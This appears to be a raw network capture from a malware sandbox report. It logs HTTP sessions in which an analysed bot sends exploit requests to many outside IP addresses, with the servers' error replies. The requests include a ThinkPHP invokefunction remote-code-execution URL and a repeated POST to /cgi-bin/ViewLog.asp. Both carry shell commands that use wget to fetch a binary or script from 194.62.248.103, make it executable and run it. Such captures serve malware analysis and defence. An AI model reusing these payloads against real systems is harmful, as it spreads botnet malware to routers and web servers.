                                                        Date: Sun, 14 Apr 2024 14:36:22 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 35 64 31 66 35 35 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 32 26 23 34 36 3b 61 31 61 37 38 36 32 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 64 35 64 31 66 35 35 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 38 32 26 23 34 36 3b 61 31 61 37 38 36 32 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;d5d1f557&#46;1713105382&#46;a1a7862<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;d5d1f557&#46;1713105382&#46;a1a7862</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        559192.168.2.233428295.110.233.14380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:22.346940041 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:22.683902025 CEST502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:36:18 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        560192.168.2.235030895.175.8.24280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:22.374841928 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:22.722784042 CEST21INHTTP/1.1
                                                        Data Raw:
                                                        Data Ascii:
                                                        Apr 14, 2024 16:36:22.747298956 CEST1248INData Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 52 6f 75 74 65 72 20 57 65 62 73 65 72 76 65 72 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: 400 Bad RequestServer: Router WebserverConnection: closeContent-Type: text/html<Script language=JavaScript>var errorCode = 400;var errorNote = "<p>URL parsing error</p>";var homeSite = "http://95.175.8.242";</script><HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        561192.168.2.233338494.122.234.2418080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:23.993447065 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        562192.168.2.235711694.123.125.828080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:23.993537903 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        563192.168.2.233320262.29.96.218080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:23.999644995 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        564192.168.2.234568894.121.220.1148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:23.999777079 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        565192.168.2.235170695.142.120.238080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:24.000207901 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        566192.168.2.2355982112.216.54.25180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:24.021054983 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:24.319967031 CEST490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:36:26 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        567192.168.2.233450031.136.33.758080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:24.308357000 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:25.273858070 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:27.193526983 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:31.160939932 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:38.839863062 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:54.198111057 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:26.449393988 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        568192.168.2.234187431.136.215.1668080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:24.308537006 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:25.273845911 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:27.193555117 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:31.160969019 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:38.839865923 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:54.198024035 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:26.449383020 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        569192.168.2.234664094.114.194.2028080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:24.309289932 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:24.625591993 CEST150INHTTP/1.1 400
                                                        Content-Type: text/plain;charset=UTF-8
                                                        Connection: close
                                                        Data Raw: 42 61 64 20 52 65 71 75 65 73 74 0d 0a 54 68 69 73 20 63 6f 6d 62 69 6e 61 74 69 6f 6e 20 6f 66 20 68 6f 73 74 20 61 6e 64 20 70 6f 72 74 20 72 65 71 75 69 72 65 73 20 54 4c 53 2e 0d 0a
                                                        Data Ascii: Bad RequestThis combination of host and port requires TLS.


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        570192.168.2.2347438112.160.31.6680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:24.313062906 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:24.608253002 CEST280INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 113
                                                        Connection: close
                                                        Date: Sun, 14 Apr 2024 14:36:24 GMT
                                                        Server: lighttpd/1.4.26
                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <html> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        571192.168.2.233432095.163.92.2518080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:24.317454100 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
